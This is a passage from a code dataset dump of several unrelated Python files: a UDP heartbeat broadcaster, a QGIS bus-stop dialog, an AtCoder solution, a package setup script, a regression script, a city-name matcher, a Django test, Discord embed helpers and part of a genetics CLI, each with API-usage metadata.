"line_number": 264, "usage_type": "attribute"}, {"api_name": "pygame.quit", "line_number": 268, "usage_type": "call"}, {"api_name": "sys.exit", "line_number": 269, "usage_type": "call"}, {"api_name": "pygame.MOUSEBUTTONDOWN", "line_number": 277, "usage_type": "attribute"}, {"api_name": "pygame.mouse.get_pos", "line_number": 281, "usage_type": "call"}, {"api_name": "pygame.mouse", "line_number": 281, "usage_type": "attribute"}, {"api_name": "pygame.quit", "line_number": 334, "usage_type": "call"}, {"api_name": "sys.exit", "line_number": 335, "usage_type": "call"}, {"api_name": "pygame.quit", "line_number": 381, "usage_type": "call"}, {"api_name": "sys.exit", "line_number": 382, "usage_type": "call"}, {"api_name": "pygame.sprite.Group", "line_number": 559, "usage_type": "call"}, {"api_name": "pygame.sprite", "line_number": 559, "usage_type": "attribute"}, {"api_name": "pygame.sprite.Group", "line_number": 603, "usage_type": "call"}, {"api_name": "pygame.sprite", "line_number": 603, "usage_type": "attribute"}, {"api_name": "pygame.sprite.Group", "line_number": 655, "usage_type": "call"}, {"api_name": "pygame.sprite", "line_number": 655, "usage_type": "attribute"}, {"api_name": "pygame.sprite.Group", "line_number": 687, "usage_type": "call"}, {"api_name": "pygame.sprite", "line_number": 687, "usage_type": "attribute"}, {"api_name": "pygame.sprite.Group", "line_number": 742, "usage_type": "call"}, {"api_name": "pygame.sprite", "line_number": 742, "usage_type": "attribute"}, {"api_name": "pygame.sprite.Group", "line_number": 832, "usage_type": "call"}, {"api_name": "pygame.sprite", "line_number": 832, "usage_type": "attribute"}, {"api_name": "pygame.sprite", "line_number": 919, "usage_type": "attribute"}, {"api_name": "pygame.sprite.Sprite.__init__", "line_number": 921, "usage_type": "call"}, {"api_name": "pygame.sprite", "line_number": 921, "usage_type": "attribute"}, {"api_name": "pygame.init", "line_number": 926, "usage_type": "call"}, {"api_name": "pygame.display.set_mode", "line_number": 930, "usage_type": "call"}, {"api_name": "pygame.display", "line_number": 930, "usage_type": "attribute"}, {"api_name": "pygame.display.set_icon", "line_number": 931, "usage_type": "call"}, {"api_name": "pygame.display", "line_number": 931, "usage_type": "attribute"}, {"api_name": "pygame.display.set_caption", "line_number": 932, "usage_type": "call"}, {"api_name": "pygame.display", "line_number": 932, "usage_type": "attribute"}]} +{"seq_id": "355496784", "text": "import datetime\nimport socket\nfrom sys import argv\nimport threading\nfrom time import sleep\n\ndef broadcastAlive():\n ip = \"\"\n port = 8989\n \n sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\n sock.setsockopt(socket.SOL_SOCKET, socket.SO_BROADCAST, 1)\n\n while True:\n msg_prefix = \"22AF4240=\" # Bon Iver - 22, A Million\n msg = msg_prefix + datetime.datetime.now().strftime(\"%A %d %H:%M:%S -- \") + socket.gethostname()\n sock.sendto(msg.encode(), (ip, port))\n sleep(5)\n\ndef broadcastThread():\n bt = threading.Thread(target=broadcastAlive)\n bt.daemon = False # True\n\n return bt\n\nbroadcastThread().start()\n", "sub_path": "Python/udp_broadcast_time.py", "file_name": "udp_broadcast_time.py", "file_ext": "py", "file_size_in_byte": 670, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "socket.socket", "line_number": 11, "usage_type": "call"}, {"api_name": "socket.AF_INET", "line_number": 11, "usage_type": "attribute"}, {"api_name": "socket.SOCK_DGRAM", "line_number": 11, "usage_type": "attribute"}, {"api_name": "socket.SOL_SOCKET", "line_number": 12, "usage_type": "attribute"}, {"api_name": "socket.SO_BROADCAST", "line_number": 12, "usage_type": "attribute"}, {"api_name": "datetime.datetime.now", "line_number": 16, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 16, "usage_type": "attribute"}, {"api_name": "socket.gethostname", "line_number": 16, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 18, "usage_type": "call"}, {"api_name": "threading.Thread", "line_number": 21, "usage_type": "call"}]} +{"seq_id": "350792782", "text": "# -*- coding: utf-8 -*-\n\"\"\"\n/***************************************************************************\n iSimGisDialog\n A QGIS plugin\n iSim converter\n -------------------\n begin : 2014-02-03\n copyright : (C) 2014 by nhudinhtuan\n email : nhudinhtuan@gmail.com\n ***************************************************************************/\n\n/***************************************************************************\n * *\n * This program is free software; you can redistribute it and/or modify *\n * it under the terms of the GNU General Public License as published by *\n * the Free Software Foundation; either version 2 of the License, or *\n * (at your option) any later version. *\n * *\n ***************************************************************************/\n\"\"\"\nfrom PyQt4 import QtCore, QtGui\nfrom ui_busstop import Ui_Busstop\nimport os\nfrom xml.etree import ElementTree\nfrom qgis.core import *\nfrom qgis.utils import *\n# create the dialog for zoom to point\n\n\nclass BusstopDialog(QtGui.QDialog, Ui_Busstop):\n busstoplist = []\n original_id = 0\n def __init__(self):\n QtGui.QDialog.__init__(self)\n # Set up the user interface from Designer.\n # After setupUI you can access any designer object by doing\n # self., and you can use autoconnect slots - see\n # http://qt-project.org/doc/qt-4.8/designer-using-a-ui-file.html\n # #widgets-and-dialogs-with-auto-connect\n self.setupUi(self)\n self.info = None\n self.isModified = False\n\n def setSegmentId(self, segmentId):\n self.segmentId.setText(str(segmentId))\n\n def setInfo(self, info):\n self.info = info\n global original_id\n if self.info is not None:\n self.isModified = True\n self.actionButton.setText(\"SAVE\")\n self.segmentId.setText(str(self.info[\"segmentId\"]))\n self.id.setText(str(self.info[\"id\"]))\n original_id = self.info[\"id\"]\n self.offset.setText(str(self.info[\"offset\"]))\n self.busCapacity.setText(str(self.info[\"busCapacity\"]))\n self.busstopNo.setText(str(self.info[\"busstopno\"]))\n if self.info[\"isTerminal\"] == \"true\" or self.info[\"isTerminal\"] == \"True\":\n self.isTerminal.setCheckState(QtCore.Qt.Checked)\n if self.info[\"isBay\"] == \"true\" or self.info[\"isBay\"] == \"True\":\n self.isBay.setCheckState(QtCore.Qt.Checked) \n if self.info[\"hasShelter\"] == \"true\" or self.info[\"hasShelter\"] == \"True\":\n self.hasShelter.setCheckState(QtCore.Qt.Checked) \n else:\n self.actionButton.setText(\"ADD\")\n QtCore.QObject.connect(self.actionButton, QtCore.SIGNAL('clicked(bool)'), self.update)\n\n def update(self):\n global original_id\n self.errorMessage.setText(\"\")\n self.info = {}\n busstopList = []\n\n # geom = f.geometry()\n # print geom.asPoint()\n # QgsPoint\n # self.info[\"segmentId\"]\n\n\n\n id = self.id.text()\n if id.isdigit() is False:\n self.errorMessage.setText(\"id is invalid. It must be a number.\")\n return\n\n\n if len(id) > 5 :\n self.errorMessage.setText(\"BusStopId is beyond range. Enter a shorter BusStopID.\")\n return\n\n layerfi = iface.activeLayer().dataProvider().dataSourceUri()\n (myDirectory,nameFile) = os.path.split(layerfi)\n tree = ElementTree.parse(myDirectory + '/data.xml')\n root = tree.getroot()\n\n for BusStop in root.iter('BusStop'):\n busstopid = BusStop.find('id').text\n busstopList.append(busstopid)\n\n if id in busstopList and id != original_id:\n self.errorMessage.setText(\"BusStop ID exists. Please enter another ID.\")\n return\n\n self.info[\"id\"] = int(id)\n busstopList.append(id)\n\n offset = self.offset.text()\n if offset.isdigit() is False:\n self.errorMessage.setText(\"offset is invalid. It must be a number.\")\n return\n self.info[\"offset\"] = int(offset)\n\n busCapacity = self.busCapacity.text()\n if busCapacity.isdigit() is False:\n self.errorMessage.setText(\"BusCapacity is invalid. It must be a number.\")\n return\n self.info[\"busCapacity\"] = int(busCapacity) \n\n busstopno = self.busstopNo.text()\n if busstopno.isdigit() is False:\n self.errorMessage.setText(\"Busstop No is invalid. It must be a number.\")\n return\n self.info[\"busstopno\"] = int(busstopno)\n\n if self.isTerminal.isChecked():\n self.info[\"isTerminal\"] = \"true\"\n else:\n self.info[\"isTerminal\"] = \"false\" \n if self.isBay.isChecked():\n self.info[\"isBay\"] = \"true\"\n else:\n self.info[\"isBay\"] = \"false\" \n if self.hasShelter.isChecked():\n self.info[\"hasShelter\"] = \"true\"\n else:\n self.info[\"hasShelter\"] = \"false\" \n\n self.info[\"segmentId\"] = int(self.segmentId.text())\n\n self.isModified = True\n self.accept()", "sub_path": "editor/busstop_dialog.py", "file_name": "busstop_dialog.py", "file_ext": "py", "file_size_in_byte": 5455, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "PyQt4.QtGui.QDialog", "line_number": 31, "usage_type": "attribute"}, {"api_name": "PyQt4.QtGui", "line_number": 31, "usage_type": "name"}, {"api_name": "ui_busstop.Ui_Busstop", "line_number": 31, "usage_type": "name"}, {"api_name": "PyQt4.QtGui.QDialog.__init__", "line_number": 35, "usage_type": "call"}, {"api_name": "PyQt4.QtGui.QDialog", "line_number": 35, "usage_type": "attribute"}, {"api_name": "PyQt4.QtGui", "line_number": 35, "usage_type": "name"}, {"api_name": "PyQt4.QtCore.Qt", "line_number": 61, "usage_type": "attribute"}, {"api_name": "PyQt4.QtCore", "line_number": 61, "usage_type": "name"}, {"api_name": "PyQt4.QtCore.Qt", "line_number": 63, "usage_type": "attribute"}, {"api_name": "PyQt4.QtCore", "line_number": 63, "usage_type": "name"}, {"api_name": "PyQt4.QtCore.Qt", "line_number": 65, "usage_type": "attribute"}, {"api_name": "PyQt4.QtCore", "line_number": 65, "usage_type": "name"}, {"api_name": "PyQt4.QtCore.QObject.connect", "line_number": 68, "usage_type": "call"}, {"api_name": "PyQt4.QtCore.QObject", "line_number": 68, "usage_type": "attribute"}, {"api_name": "PyQt4.QtCore", "line_number": 68, "usage_type": "name"}, {"api_name": "PyQt4.QtCore.SIGNAL", "line_number": 68, "usage_type": "call"}, {"api_name": "os.path.split", "line_number": 94, "usage_type": "call"}, {"api_name": "os.path", "line_number": 94, "usage_type": "attribute"}, {"api_name": "xml.etree.ElementTree.parse", "line_number": 95, "usage_type": "call"}, {"api_name": "xml.etree.ElementTree", "line_number": 95, "usage_type": "name"}]} +{"seq_id": "585908852", "text": "# https://atcoder.jp/contests/abc005/tasks/abc005_4\nimport sys\nsys.setrecursionlimit(2147483647)\nINF=float(\"inf\")\nMOD=10**9+7\ninput=lambda:sys.stdin.readline().rstrip()\nclass cumsum2d(object):\n def __init__(self,m,n):\n self.__m=m\n self.__n=n\n self.__S=[[0]*(n+1) for _ in range(m+1)]\n\n def __repr__(self):\n return '\\n'.join(' '.join(map(str,s)) for s in self.__S)\n\n def add(self,i,j,w):\n self.__S[i+1][j+1]+=w\n\n def cumulate(self):\n S=self.__S\n for i in range(self.__m):\n for j in range(self.__n):\n S[i+1][j+1]+=S[i+1][j]+S[i][j+1]-S[i][j]\n\n def sum(self,i0,i1,j0,j1):\n S=self.__S\n return S[i1][j1]-S[i0][j1]-S[i1][j0]+S[i0][j0]\n\ndef resolve():\n n=int(input())\n C=cumsum2d(n,n)\n for i in range(n):\n for j,d in enumerate(map(int,input().split())):\n C.add(i,j,d)\n C.cumulate()\n\n score=[-INF]*(n**2+1)\n from itertools import product\n for di,dj in product(range(1,n+1),repeat=2):\n for i,j in product(range(n-di+1),range(n-dj+1)):\n score[di*dj]=max(score[di*dj],C.sum(i,i+di,j,j+dj))\n for i in range(n**2):\n score[i+1]=max(score[i+1],score[i])\n\n for _ in range(int(input())):\n print(score[int(input())])\nresolve()\n", "sub_path": "ABC005/d_おいしいたこ焼きの焼き方.py", "file_name": "d_おいしいたこ焼きの焼き方.py", "file_ext": "py", "file_size_in_byte": 1290, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "sys.setrecursionlimit", "line_number": 3, "usage_type": "call"}, {"api_name": "sys.stdin.readline", "line_number": 6, "usage_type": "call"}, {"api_name": "sys.stdin", "line_number": 6, "usage_type": "attribute"}, {"api_name": "itertools.product", "line_number": 39, "usage_type": "call"}, {"api_name": "itertools.product", "line_number": 40, "usage_type": "call"}]} +{"seq_id": "103610086", "text": "# Checking python version: If python 3 was not found then it returns 1 and does\n# not do anything\nfrom platform import python_version\nprimer_version = python_version().split(\".\")\nif int(primer_version[0]) != 3:\n print (\"This module only works with python3\")\n print (\"To setup the module simply run `python3 setup.py install`\")\n exit(1)\n\n\n# Checking the version of python interpreter. This code only works with python3.\nimport sys\nif sys.version_info < (3,5):\n sys.exit('Python < 3.5 is not supported')\n\n\n#from distutils.core import setup, Extension\nfrom setuptools import setup, Extension\nimport os\nimport numpy\n\n\n# Utility function to read the README file.\ndef read(fname):\n return open(os.path.join(os.path.dirname(__file__), fname)).read()\n\nextension_mod = Extension(\"lilcom.lilcom_c_extension\",\n sources=[\"lilcom/lilcom_c_extension.c\",\"lilcom/lilcom.c\"],\n extra_compile_args=[\"-DNDEBUG\"],\n #extra_compile_args=[\"-g\"],\n include_dirs=[numpy.get_include()])\n\nsetup(\n name = \"lilcom\",\n python_requires='>=3.5',\n version = \"0.0.0\",\n author = \"Daniel Povey, Soroush Zargar, Mahsa Yarmohammadi\",\n author_email = \"dpovey@gmail.com\",\n description = (\"Small compression utility for sequence data in NumPy\"),\n license = \"BSD\",\n keywords = \"compression numpy\",\n packages=['lilcom'],\n url = \"http://packages.python.org/an_example_pypi_project\",\n ext_modules=[extension_mod],\n long_description=read('README.md'),\n classifiers=[\n \"Development Status :: 1 - Planning\",\n \"Topic :: Utilities\",\n \"License :: OSI Approved :: BSD License\",\n ],\n)\n\nexit(0)\n", "sub_path": "setup.py", "file_name": "setup.py", "file_ext": "py", "file_size_in_byte": 1722, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "platform.python_version", "line_number": 4, "usage_type": "call"}, {"api_name": "sys.version_info", "line_number": 13, "usage_type": "attribute"}, {"api_name": "sys.exit", "line_number": 14, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 25, "usage_type": "call"}, {"api_name": "os.path", "line_number": 25, "usage_type": "attribute"}, {"api_name": "os.path.dirname", "line_number": 25, "usage_type": "call"}, {"api_name": "setuptools.Extension", "line_number": 27, "usage_type": "call"}, {"api_name": "numpy.get_include", "line_number": 31, "usage_type": "call"}, {"api_name": "setuptools.setup", "line_number": 33, "usage_type": "call"}]} +{"seq_id": "417348233", "text": "import pandas as pd \r\nimport numpy as np \r\nfrom sklearn.model_selection import train_test_split\r\n\r\nfrom ComputeL2Cost import computeL2Cost\r\nfrom ComputeGradient import computeGradient\r\nfrom GradientDescent import gradientDescent\r\n\r\n# Reading and loading X and y\r\ndataset = pd.read_excel(\"C://Users//Ratan Singh//Desktop//ML Training Code//LinearRegression//cancer_reg.xlsx\")\r\nn = dataset.shape[1] - 1\r\nX = np.array(dataset.iloc[:,0:4])\r\ny = np.array(dataset.iloc[:,4])\r\n\r\nX_train, X_test, Y_train, Y_test = train_test_split(X,y,test_size = 0.3)\r\n\r\n\r\n# Defining parameters for gradient descent\r\n\r\ninitalWeights = np.random.random([1,X.shape[1]])\r\nmaxIter = 100\r\nlearningRate = 0.1\r\n\r\n\r\n# Training a Logistic Regression\r\n\r\nweights = initalWeights\r\ncost = []\r\n\r\nfor i in range(maxIter):\r\n\r\n\typ = np.matmul(weights, X_train.T).ravel()\r\n\tJ = computeL2Cost(Y_train, yp)\r\n\tG = computeGradient(X_train, Y_train, yp)\r\n\tweights = gradientDescent(weights, G, learningRate)\r\n\r\n\tif i%10 ==0:\r\n\t\tprint(\"Cost of the model is {}\".format(J))\r\n\tcost.append(J)\r\n\r\n\r\nprint(\"Weights {} after the training are\".format(weights))\r\n\r\n\r\n\r\n# Prediction using the model\r\n\r\nyp = np.matmul(weights, X_test.T).ravel()\r\nprint(\"MSE for the fitted model is {}\".format(computeL2Cost(Y_test,yp)))\r\n\r\n\r\n", "sub_path": "Regression/StepwiseRegression/LinearRegression.py", "file_name": "LinearRegression.py", "file_ext": "py", "file_size_in_byte": 1266, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "pandas.read_excel", "line_number": 10, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 12, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 13, "usage_type": "call"}, {"api_name": "sklearn.model_selection.train_test_split", "line_number": 15, "usage_type": "call"}, {"api_name": "numpy.random.random", "line_number": 20, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 20, "usage_type": "attribute"}, {"api_name": "numpy.matmul", "line_number": 32, "usage_type": "call"}, {"api_name": "ComputeL2Cost.computeL2Cost", "line_number": 33, "usage_type": "call"}, {"api_name": "ComputeGradient.computeGradient", "line_number": 34, "usage_type": "call"}, {"api_name": "GradientDescent.gradientDescent", "line_number": 35, "usage_type": "call"}, {"api_name": "numpy.matmul", "line_number": 48, "usage_type": "call"}, {"api_name": "ComputeL2Cost.computeL2Cost", "line_number": 49, "usage_type": "call"}]} +{"seq_id": "347731616", "text": "#! -*- encoding: utf-8 -*-\n\nfrom sys import argv, exit\n\n\nTHRESHOULD = 3\n\ndef read_file(city_file):\n import yaml\n\n with open(city_file,'r') as f:\n cities = yaml.load(f, Loader=yaml.FullLoader)\n f.close()\n\n return cities\n\ndef handle_city_name(city_name):\n from unidecode import unidecode\n\n handled_city_name = unidecode(city_name.lower().replace(\"'\",''))\n handled_city_name = handled_city_name.replace('-',' ')\n handled_city_name = handled_city_name.replace('_',' ')\n\n return handled_city_name\n\ndef generate_hash_cities(cities, city_name):\n import Levenshtein\n\n city_name = handle_city_name(city_name)\n proximity = {}\n for i in range(THRESHOULD):\n proximity[i] = {}\n\n for key, value in cities.items():\n value_name = handle_city_name(value['nome_municipio'])\n dist = Levenshtein.distance(value_name, city_name)\n\n if (dist < THRESHOULD):\n proximity[dist][value['nome_municipio']] = {'codigo_municipio':value['codigo_municipio'], 'sigla_uf':value['sigla_uf']}\n\n return proximity\n\ndef get_city_code(hash_cities):\n print('Por favor, confirme o nome da cidade e a UF:')\n print('--------------------------------------------')\n count = 0\n answer = {}\n\n if (hash_cities[0] != {}):\n city = list(hash_cities[0].keys())[0]\n print(str(count)+':', city, '-', hash_cities[0][city]['sigla_uf'], '[Enter]')\n print()\n answer[count] = hash_cities[0][city]['codigo_municipio']\n count += 1\n \n cities = list(hash_cities[0].keys())[1:]\n for city in cities:\n print(str(count), '-', city, '-', hash_cities[0][city]['sigla_uf'])\n answer[count] = hash_cities[0][city]['codigo_municipio']\n count += 1\n\n city_proximity = list(hash_cities.keys())[1:]\n for key in city_proximity:\n for city in hash_cities[key].keys():\n print(str(count)+':', city, '-', hash_cities[key][city]['sigla_uf'])\n answer[count] = hash_cities[key][city]['codigo_municipio']\n count += 1\n print('--------------------------------------------')\n print('Insira o número correspondente à opção: ')\n idx_city = input()\n \n if (idx_city != '' and not idx_city.isdigit() and int(idx_city) not in range(count)):\n print('Opção inválida! Tente novamente.')\n\n return get_city_code(hash_cities)\n \n if (idx_city == ''):\n return answer[0]\n elif (idx_city.isdigit()):\n return answer[int(idx_city)]\n else:\n print('Um erro inesperado aconteceu.')\n print('Execução abortada.')\n exit(-1)\n\ndef save_in_file(city_code, tmp_file):\n with open(tmp_file,'w') as f:\n f.write(city_code)\n f.close()\n\ndef main():\n if (len(argv) != 4):\n print('Usage:', argv[0], '', '', '')\n exit(-1)\n\n city_file = argv[1]\n city_name = argv[2]\n tmp_file = argv[3]\n\n cities = read_file(city_file)\n hash_cities = generate_hash_cities(cities, city_name)\n city_code = get_city_code(hash_cities)\n\n save_in_file(city_code, tmp_file)\n return 0\n\nif (__name__ == '__main__'):\n main()\n", "sub_path": "bin/get_city_code.py", "file_name": "get_city_code.py", "file_ext": "py", "file_size_in_byte": 3212, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "yaml.load", "line_number": 12, "usage_type": "call"}, {"api_name": "yaml.FullLoader", "line_number": 12, "usage_type": "attribute"}, {"api_name": "unidecode.unidecode", "line_number": 20, "usage_type": "call"}, {"api_name": "Levenshtein.distance", "line_number": 36, "usage_type": "call"}, {"api_name": "sys.exit", "line_number": 84, "usage_type": "call"}, {"api_name": "sys.argv", "line_number": 92, "usage_type": "argument"}, {"api_name": "sys.argv", "line_number": 93, "usage_type": "name"}, {"api_name": "sys.exit", "line_number": 94, "usage_type": "call"}, {"api_name": "sys.argv", "line_number": 96, "usage_type": "name"}, {"api_name": "sys.argv", "line_number": 97, "usage_type": "name"}, {"api_name": "sys.argv", "line_number": 98, "usage_type": "name"}]} +{"seq_id": "288050467", "text": "# -*- coding: utf-8 -*-\nfrom rest_framework.test import APITransactionTestCase\n\nfrom tiny_urls.users.models import User\nfrom tiny_urls.urls.models import Url\n\n\nclass TestUrlRedirect(APITransactionTestCase):\n def setUp(self):\n self.user = User.objects.create(email='williandmorais@gmail.com')\n self.url = Url.objects.create(\n user=self.user,\n url='https://www.google.com.br',\n hits=0\n )\n self.client.force_authenticate(self.user)\n\n def test_url_redirect(self):\n response = self.client.get(\n '/urls/{}/'.format(self.url.short_url),\n format='json'\n )\n\n self.assertRedirects(response, 'https://www.google.com.br', status_code=301, fetch_redirect_response=False)\n\n self.url.refresh_from_db()\n self.assertEqual(self.url.hits, 1)\n\n def test_url_redirect_not_found(self):\n response = self.client.get(\n '/urls/invalid/',\n format='json'\n )\n\n self.assertDictEqual(response.json(), {'detail': 'Not found.'})\n self.assertEqual(response.status_code, 404)\n", "sub_path": "tests/test_urls/test_url_redirect.py", "file_name": "test_url_redirect.py", "file_ext": "py", "file_size_in_byte": 1118, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "rest_framework.test.APITransactionTestCase", "line_number": 8, "usage_type": "name"}, {"api_name": "tiny_urls.users.models.User.objects.create", "line_number": 10, "usage_type": "call"}, {"api_name": "tiny_urls.users.models.User.objects", "line_number": 10, "usage_type": "attribute"}, {"api_name": "tiny_urls.users.models.User", "line_number": 10, "usage_type": "name"}, {"api_name": "tiny_urls.urls.models.Url.objects.create", "line_number": 11, "usage_type": "call"}, {"api_name": "tiny_urls.urls.models.Url.objects", "line_number": 11, "usage_type": "attribute"}, {"api_name": "tiny_urls.urls.models.Url", "line_number": 11, "usage_type": "name"}]} +{"seq_id": "431004507", "text": "import copy\nimport discord\nimport re\n\n\nMAX_DESC_CAPACITY = 2048\nMAX_FIELD_CAPACITY = 1024\nRE_HANGING_PARAGRAPHS = re.compile(r'\\n(?=\\S)')\n\n\nclass UtilityError(Exception):\n \"\"\"Base class for utility-related exceptions.\"\"\"\n def __init__(self, message):\n self.message = message\n\n\nclass OverlongEmbedComponentError(UtilityError):\n def __init__(self, item):\n super().__init__(\n 'Desired embed component has length %d exceeding %d:\\n%r' % (\n len(item), MAX_FIELD_CAPACITY, item))\n\n\ndef paginated_embed_content(*,\n title,\n content,\n break_re=RE_HANGING_PARAGRAPHS,\n rejoin='\\n',\n **embed_kwargs):\n \"\"\"Generate a list of embeds, resulting from the pagination of CONTENT.\"\"\"\n embed_descs, capacity = [[]], MAX_DESC_CAPACITY\n for fragment in re.split(break_re, content):\n if len(fragment) > MAX_DESC_CAPACITY:\n raise OverlongEmbedComponentError(fragment)\n if len(fragment) < capacity:\n embed_descs[-1].append(fragment)\n capacity -= len(fragment) + 1\n else:\n embed_descs.append([fragment])\n capacity = MAX_DESC_CAPACITY - len(fragment)\n\n if len(embed_descs) == 1:\n return [discord.Embed(title=title,\n description=rejoin.join(embed_descs[0]),\n **embed_kwargs)]\n else:\n return [discord.Embed(title='%s (%d/%d)' % (title, idx, len(embed_descs)),\n description=rejoin.join(fragments),\n **embed_kwargs)\n for idx, fragments in enumerate(embed_descs, start=1)]\n\n\ndef paginated_embed_fields(*,\n fields,\n break_re=RE_HANGING_PARAGRAPHS,\n **embed_kwargs):\n \"\"\"Generate a list of embeds, resulting from the pagination of FIELDS content.\n\n Args:\n fields - A list of `(field_name, field_value)` pairs indicating the desired\n embed content. (Note that `\"\"` is a valid field_name.)\n break_re - A regex object (or a string denoting a regex) used to break\n `field_value`s into smaller pieces for pagination. It defaults to\n `r'\\\\n(?=\\\\S)'`, which breaks paragraphs with hanging indentation.\n embed_kwargs - Valid keyword args for `discord.Embed`.\n Returns:\n A list of embeds, containing paginated `field_value` content, with\n `field_name`s rewritten to indicate the number of pages they've been\n broken into.\"\"\"\n\n embed_fields, capacity = [[]], MAX_FIELD_CAPACITY\n # embed_fields is a list of embed contents, where each embed's contents is\n # represented as a list of (field_name, field_value) pairs\n for field_name, field_value in fields:\n field_segments = [[]]\n for field_piece in re.split(break_re, field_value):\n if len(field_piece) > MAX_FIELD_CAPACITY:\n raise OverlongEmbedComponentError(field_piece)\n if len(field_piece) < capacity:\n field_segments[-1].append(field_piece)\n capacity -= (len(field_piece) + 1) # include eventual newline separator\n else:\n # Fit the piece into a new field segment\n field_segments.append([field_piece])\n capacity = MAX_FIELD_CAPACITY - len(field_piece)\n if len(field_segments) == 1:\n embed_fields[-1].append((field_name, '\\n'.join(field_segments[0])))\n else:\n embed_fields[-1].append(('%s (1/%d)' % (field_name, len(field_segments)),\n '\\n'.join(field_segments[0])))\n embed_fields.extend(\n [('%s (%d/%d)' % (field_name, segment_idx + 1, len(field_segments)),\n '\\n'.join(content))]\n for segment_idx, content in enumerate(field_segments[1:], start=1))\n\n embeds = []\n for content in embed_fields:\n new_embed = discord.Embed(**embed_kwargs)\n for name, value in content:\n new_embed.add_field(name=name, value=value, inline=False)\n embeds.append(new_embed)\n return embeds\n", "sub_path": "secretkeeper/utils.py", "file_name": "utils.py", "file_ext": "py", "file_size_in_byte": 3972, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "re.compile", "line_number": 8, "usage_type": "call"}, {"api_name": "re.split", "line_number": 32, "usage_type": "call"}, {"api_name": "discord.Embed", "line_number": 43, "usage_type": "call"}, {"api_name": "discord.Embed", "line_number": 47, "usage_type": "call"}, {"api_name": "re.split", "line_number": 76, "usage_type": "call"}, {"api_name": "discord.Embed", "line_number": 98, "usage_type": "call"}]} +{"seq_id": "174304343", "text": "# -*- coding: utf-8 -*-\n\n#MIT License\n\n#Copyright (c) 2017 Marton Kelemen\n\n#Permission is hereby granted, free of charge, to any person obtaining a copy\n#of this software and associated documentation files (the \"Software\"), to deal\n#in the Software without restriction, including without limitation the rights\n#to use, copy, modify, merge, publish, distribute, sublicense, and/or sell\n#copies of the Software, and to permit persons to whom the Software is\n#furnished to do so, subject to the following conditions:\n\n# The above copyright notice and this permission notice shall be included in all \n# copies or substantial portions of the Software.\n\n#THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n#IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n#FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\n#AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n#LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n#OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE\n#SOFTWARE.\n\n\n# Dependencies:\n# numpy\n# scipy\n\n\n\n# https://docs.python.org/3/library/argparse.html\n#https://docs.python.org/3/howto/argparse.html \nimport argparse\nfrom pathlib import Path\n\n\nfrom com.application.logic.knet import knet_manager\nfrom com.application.logic.scanner import scanner\nfrom com.application.utils import plotgen\n\nfrom com.io import knet_IO\nimport os\nimport gc\nimport numpy as np\n\ndef set_Threads(args) : \n if args.threads is not None :\n os.environ['MKL_NUM_THREADS'] = args.threads # '16' # use h ere the N , where N: the number of cores acailable or limit to 1\n os.environ['MKL_DYNAMIC'] = 'FALSE'\n os.environ['OMP_NUM_THREADS'] = '1'\n \n print(\"set MKL number of threads to: \" + str(args.threads))\n \n \ndef set_nixMem(args) : \n if args.nixMem is not None :\n import resource # this only exists on Unix/Linux based systems\n rsrc = resource.RLIMIT_AS\n soft, hard = resource.getrlimit(rsrc)\n print('Soft limit starts as :', soft)\n print('Hard limit starts as :', hard)\n \n resource.setrlimit(rsrc, (args.nixMem * 1048576, hard)) #limit\n \n soft, hard = resource.getrlimit(rsrc)\n print('Soft limit changed to :', soft)\n print('Hard limit changed to :', hard)\n\n\ndef rundom(args) :\n set_Threads(args)\n set_nixMem(args) \n print('Knet recoding genotype matrix into dominance contrasts started') \n from com.application.logic.reml import kinship\n import shutil\n \n # load data\n genotypeData = knet_IO.loadPLINK(args.bfile, loadPhenos = False, replaceMissing = True) \n M = genotypeData[\"M\"]\n del genotypeData ; gc.collect() # dont need this\n \n # recode to dominance\n M = kinship.recodeSNPs_to_Dominance(M)\n\n #write it to disk\n knet_IO.writePLINK(args.out,M) \n \n # need to copy the .bim/.fam , as pyplink does not write those...\n shutil.copyfile(args.bfile + \".bim\", args.out +\".bim\")\n shutil.copyfile(args.bfile + \".fam\", args.out +\".fam\")\n print(\"written dominance genotype data to\", args.out)\n\n\n\ndef runmhe(args) :\n set_Threads(args)\n set_nixMem(args) \n print('Knet estimating Variance Components via Multiple Haseman-Elston Regression started') \n from com.application.utils import geno_qc\n # load plink binary (or eigen summary) / phenotypes\n cc = True\n if args.cc == 0 : cc = False\n \n recodecc = True\n if args.recodecc == 0 : recodecc = False # IE if this is FALSE, then we will NOT recode \n \n # load training data\n y = knet_IO.loadPLINKPheno(args.pheno, caseControl = cc, recodeCaseControl = recodecc) \n y = geno_qc.standardise_Genotypes(y)\n\n\n\n from com.application.logic.he import multi_he\n \n # depending on what MHE is requested run that\n if args.res == 0 : multi_he.HE_Multi_external(args, y)\n else : multi_he.HE_Multi_residuals(args, y)\n \n\n \n # concern, shouldn't we 'square' the XX^T, BEFORE dividing it by p ? and dividing it by p 